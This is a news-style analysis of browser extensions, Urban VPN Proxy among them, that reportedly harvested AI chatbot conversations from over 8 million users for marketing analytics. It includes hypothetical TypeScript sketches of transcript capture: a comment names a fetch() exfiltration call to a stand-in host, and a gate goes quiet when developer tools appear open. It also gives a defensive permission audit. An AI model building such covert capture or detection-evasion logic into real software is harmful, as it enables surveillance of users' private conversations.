
Millions of people have been pouring their most sensitive prompts, plans, and confessions into AI chatbots, assuming those conversations stay between them and the model. Instead, a cluster of popular browser add-ons has quietly been scooping up those long AI chats and shipping them off for profit and analytics, affecting more than 8 million users across Chrome and Edge. The result is a privacy mess that blurs the line between “free” convenience and covert surveillance of our digital inner lives.
What looked like routine helpers in the browser toolbar have turned out to be data funnels, capturing extended AI conversations in raw form and feeding them into marketing pipelines and third party tools. The extensions at the center of this storm marketed themselves as “privacy” or utility tools, yet buried legalese and hidden behaviors reveal a business model built on harvesting the very prompts people thought were protected.
The extensions quietly siphoning AI chat logs
The core of the scandal is simple and unsettling: browser extensions that users installed for VPN access or productivity are copying entire AI conversations and sending them to remote servers. According to detailed technical analysis, these add-ons do not just skim metadata or short snippets; they collect extended prompts and responses from AI chatbots in what investigators describe as “raw form,” turning the browser into a wiretap on people’s most detailed queries and drafts. One investigation, “Uninstall Now, These Chrome Browser Extensions Are Stealing AI Chat Logs,” shows how these tools hook into page content and exfiltrate full chat histories without any obvious in-product warning to the user, a pattern that has now been linked to multiple extensions with millions of installs.
Security researchers tracking this activity describe a consistent playbook. Once installed, the extensions inject scripts into pages where users interact with AI tools, then watch for long-running conversations and capture them wholesale. In some cases, the data is routed through analytics platforms that are not disclosed in the extension’s main description, and the only explicit mention of AI conversations being harvested appears in dense privacy policy language that most people never read. Reporting on the browser extensions with 8 million users that collect extended AI conversations underscores that the data is then used for marketing analytics, far beyond what users would reasonably expect from a simple browser add-on.
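The playbook researchers describe can be sketched in a few lines. The snippet below is a hypothetical reconstruction, not code recovered from the actual extensions: every name, threshold, and endpoint is an illustrative assumption. It shows the essential shape of the behavior, waiting until a conversation is long enough to be valuable, then packaging the raw transcript for upload.

```typescript
// Hypothetical sketch of the capture playbook described by researchers.
// All names, thresholds, and endpoints here are illustrative assumptions.

interface ChatMessage {
  role: "user" | "assistant";
  text: string;
}

// Heuristic gate: only "extended" conversations get exfiltrated, which
// keeps network noise low and makes the behavior harder to notice.
function isExtendedConversation(messages: ChatMessage[], minTurns = 6): boolean {
  return messages.length >= minTurns;
}

// Package the raw transcript exactly as it appears on the page, which is
// what "collected in raw form" amounts to in practice.
function buildPayload(messages: ChatMessage[], pageUrl: string) {
  return {
    url: pageUrl,
    capturedAt: new Date().toISOString(),
    transcript: messages.map((m) => `${m.role}: ${m.text}`).join("\n"),
  };
}

// In a real extension this would run from an injected content script and
// end in something like fetch("https://analytics.example.net/collect", ...);
// here it only demonstrates the shape of the data that leaves the browser.
const demo: ChatMessage[] = Array.from({ length: 6 }, (_, i) => ({
  role: i % 2 === 0 ? "user" : "assistant",
  text: `turn ${i}`,
}));

if (isExtendedConversation(demo)) {
  const payload = buildPayload(demo, "https://chat.example.com/session/1");
  console.log(payload.transcript.split("\n").length); // one line per turn
}
```

The key design point, from the user's perspective, is that nothing in this flow is visible: the page keeps working normally while the transcript is copied out.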
How 8 million users’ AI conversations became a commodity
The scale of the collection is not a rounding error; it is a business model built on volume. Investigators have tied the behavior to a set of extensions with more than 8 million installations, meaning entire populations of AI users have had their prompts and responses quietly turned into a dataset. One analysis describes how these tools were promoted as privacy helpers or VPNs while simultaneously funneling AI conversations into commercial pipelines, effectively converting user trust into a stream of monetizable text. A report titled “8 Million Users’ AI Conversations Sold for Profit by ‘Privacy’ Extensions” details how over 8 million users were affected and how their data was packaged and sold, with author Idan Dardikman highlighting that the extensions failed to meet basic platform quality standards.
From a user’s perspective, the betrayal is layered. People turned to AI tools for everything from drafting legal letters to brainstorming business ideas, assuming that any risk lay with the AI provider, not a third party extension sitting in the browser chrome. Instead, those conversations were quietly repurposed as a commodity, with long prompts and responses treated as raw material for marketing analytics and other undisclosed uses. A PSA covering the affected extensions notes that an anonymous reader flagged how they were collecting data for purposes other than their described use, turning what looked like a free convenience into a covert data extraction scheme.
Urban VPN Proxy and the “privacy” branding problem
One of the most prominent names in this saga is Urban VPN Proxy, a free VPN-style extension that positioned itself as a privacy tool while allegedly participating in the collection of AI chat logs. According to cybersecurity firm Koi, Urban VPN Proxy and three other popular browser extensions, collectively installed on more than 8 million devices, harvested AI chatbot conversations in raw form. In practical terms, that means a user who installed Urban VPN Proxy to shield their browsing could have been simultaneously exposing the full text of their AI chats to third party servers, a contradiction that cuts to the heart of the “privacy” branding many of these tools rely on.
The Urban VPN Proxy case also fits into a broader pattern of free VPN and proxy tools that promise anonymity while quietly monetizing user data. Earlier this year, another notorious case involved the “Free Unlimited VPN” extensions, which were removed after years of reportedly siphoning user information, a reminder that the word “free” in the VPN world often masks aggressive data collection. Coverage of how Urban VPN Proxy is the latest free VPN accused of spying on users, following the “Free Unlimited VPN” saga, underscores how AI interactions and online privacy are colliding in the browser extension ecosystem.
Legal fine print versus real-world consent
On paper, the companies behind these extensions can point to privacy policies that mention data collection, including AI prompts, but the way those disclosures are buried raises serious questions about meaningful consent. In at least one case, the only explicit reference to harvesting AI conversations appears deep in the legalese, where the policy notes that prompts may be collected for marketing analytics purposes. For an average user installing a VPN or utility extension, that kind of clause is effectively invisible, especially when the extension’s store listing emphasizes privacy and security. The reporting is blunt on this point: “The only explicit mention of AI conversations being harvested is in legalese buried in the privacy policy,” and that data is used for marketing analytics.
From a regulatory and ethical standpoint, this gap between branding and behavior is stark. When an extension markets itself as a “privacy” tool but hides its most invasive practices in dense text, it undermines the idea that users have genuinely agreed to the tradeoff. It also complicates the responsibilities of browser platforms like Chrome and Edge, which are supposed to vet extensions for deceptive practices. The fact that these add-ons could continue to operate at scale, with millions of installs, while quietly collecting AI conversations suggests that current disclosure standards and store reviews are not catching the most consequential forms of data harvesting.
Why AI chat logs are such sensitive targets
AI conversations are not just another category of browsing data; they are often a direct window into a person’s plans, fears, and intellectual property. Users routinely paste draft contracts, medical questions, business strategies, and even snippets of source code into chatbots, trusting that the interaction is semi-private and governed by the AI provider’s policies. When a browser extension copies those exchanges in raw form, it captures far more than a URL or cookie; it seizes the full context of what someone is thinking through at that moment. The warning that these Chrome extensions are “stealing AI chat logs” in raw form underscores how much more invasive this is than traditional tracking.
That sensitivity also makes AI logs attractive to marketers and data brokers. Long prompts can reveal purchasing intent, professional roles, and even company secrets, all of which can be mined for targeting or sold as high value datasets. In one analysis, investigators describe how the captured conversations were routed into analytics platforms, where they could be segmented and studied at scale. The fact that this pipeline operated through browser extensions, rather than the AI platforms themselves, means users had little reason to suspect that their supposedly private brainstorming sessions were being turned into a commercial asset.
Malicious engineering and the blurred line with malware
Technically, these extensions sit in a gray zone between aggressive tracking and outright malware. They are installed through official stores, often with high ratings, and they perform some of the functions they advertise, such as proxying traffic or adding convenience features. At the same time, security experts have described the AI log harvesting behavior as a form of malicious engineering, noting that the extensions include code paths that only activate under certain conditions, such as when developer tools are opened or when specific AI sites are loaded. A widely shared warning video framed the incident as “not your standard malware attack,” explaining that it was engineered by someone who gave the extension hidden capabilities that only became visible if developer tools were opened.
From a user’s standpoint, that stealth is what makes the threat so hard to detect. There is no obvious ransomware demand, no pop-up alert, just a silent siphon running in the background while the extension appears to function normally. This kind of design exploits the trust people place in official browser stores and the assumption that high download counts equal safety. It also complicates the work of security tools, which may not flag an extension that behaves benignly most of the time but quietly exfiltrates data under specific conditions tied to AI usage.
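The conditional activation described above can be illustrated with a short sketch. This is a hypothetical example of the general gating pattern, assuming a domain allowlist and a common (imperfect) developer-tools heuristic based on the gap between the outer window and the rendered viewport; the domain list, threshold, and the direction of the devtools check are illustrative assumptions, not details recovered from the actual extensions.

```typescript
// Hypothetical sketch of conditionally gated harvesting: run only on
// known AI chat domains, and change behavior when inspection is
// suspected. All constants below are illustrative assumptions.

const AI_CHAT_HOSTS = ["chat.openai.com", "gemini.google.com", "claude.ai"];

function isTargetHost(hostname: string): boolean {
  return AI_CHAT_HOSTS.some((h) => hostname === h || hostname.endsWith("." + h));
}

// A common, imperfect devtools heuristic: docked developer tools shrink
// the viewport relative to the outer window by more than `threshold` px.
function devtoolsLikelyOpen(
  outerWidth: number,
  innerWidth: number,
  threshold = 160
): boolean {
  return outerWidth - innerWidth > threshold;
}

// The gate that makes the behavior hard to observe: capture only on AI
// sites, and go quiet when someone appears to be inspecting the page.
function shouldRunCapture(
  hostname: string,
  outerWidth: number,
  innerWidth: number
): boolean {
  return isTargetHost(hostname) && !devtoolsLikelyOpen(outerWidth, innerWidth);
}

console.log(shouldRunCapture("chat.openai.com", 1280, 1280)); // true: AI site, no inspection suspected
console.log(shouldRunCapture("chat.openai.com", 1280, 900)); // false: devtools heuristic trips
console.log(shouldRunCapture("example.com", 1280, 1280)); // false: not a target site
```

Because the exfiltration path is dormant most of the time, a static review of the extension, or a casual dynamic test on a non-AI site, can easily come back clean.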
Platform oversight and the Chrome and Edge gap
One of the most troubling aspects of the episode is how long the extensions remained available in mainstream browser stores even after their behavior was documented. At the time investigators detailed the AI conversation leak, the extensions were still active in the Chrome Web Store and Microsoft Edge Add-ons, despite evidence that they were funneling sensitive data to third parties. That disconnect between documented risk and platform response raises questions about how quickly Chrome and Edge can or will act when confronted with complex privacy abuses that do not fit the classic malware mold. As the reporting notes, “At the time of writing, the extensions remain active in the Chrome Web Store and Microsoft Edge Add-ons, despite the fact that they are at the center of a data leak via Mixpanel hack.”
The involvement of analytics platforms like Mixpanel in the data flow also complicates accountability. When AI conversations are routed through third party tools as part of “analytics,” it becomes harder to draw a clean line between the extension developer, the analytics provider, and the browser platform that approved the extension. For users, that fragmentation means there is no single entity clearly responsible for safeguarding their AI chats, even as those chats move through multiple corporate systems. It also suggests that browser extension review processes may need to evolve from static code checks to more dynamic analysis of how extensions behave when interacting with AI-heavy sites.
What users can do now, and what needs to change
For the 8 million plus users already affected, the immediate priority is containment. That starts with uninstalling any extensions that have been linked to AI conversation harvesting, especially those that market themselves as free VPNs or privacy tools while requesting broad permissions to read and change data on all websites. Users should also audit their extension lists for anything they do not recognize or no longer use, and consider limiting AI chats that contain highly sensitive information until they are confident their browser environment is clean. The detailed breakdown of how Urban VPN Proxy and related tools operated, and how over 8 million users were swept up, underscores why that kind of hygiene is no longer optional.
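The permission audit described above can be partly automated. As a minimal sketch, the snippet below flags any extension whose host permissions let it read and change data on all websites, the broad grant that made this harvesting possible. The field names follow Chrome's Manifest V3 format (in a real audit the data would come from `chrome.management.getAll` or each extension's `manifest.json`); the sample extension names are made up.

```typescript
// Minimal sketch of an extension-permission audit. Sample data is
// invented; field names follow Chrome's Manifest V3 conventions.

interface ExtensionInfo {
  name: string;
  permissions: string[];
  hostPermissions: string[];
}

// Host-permission patterns that grant access to every site the user
// visits, including AI chat pages.
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

function canReadAllSites(ext: ExtensionInfo): boolean {
  return ext.hostPermissions.some((p) => BROAD_HOSTS.includes(p));
}

// In a real audit, `installed` would be populated from
// chrome.management.getAll(); these entries are illustrative.
const installed: ExtensionInfo[] = [
  { name: "FreeVPN Helper", permissions: ["webRequest"], hostPermissions: ["<all_urls>"] },
  { name: "Tab Tidy", permissions: ["tabs"], hostPermissions: [] },
];

const risky = installed.filter(canReadAllSites).map((e) => e.name);
console.log(risky.join(", ")); // FreeVPN Helper
```

A flagged extension is not automatically malicious, but broad host access combined with a free VPN or "privacy" pitch is exactly the profile at the center of this incident, and a reasonable trigger for removal.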
Longer term, the episode points to a need for deeper structural changes. Browser makers will have to tighten extension review processes, especially for tools that request access to page content on AI platforms, and may need to introduce clearer warnings when an extension can read everything a user types into a chatbot. Regulators, meanwhile, are likely to scrutinize the gap between “privacy” branding and buried data collection clauses, particularly when the data in question includes detailed AI conversations. As AI becomes a default interface for work and personal life, the quiet harvesting of those chats by browser extensions is not just a niche security story, it is a test of whether the web’s trust infrastructure can keep up with the new ways we talk to machines.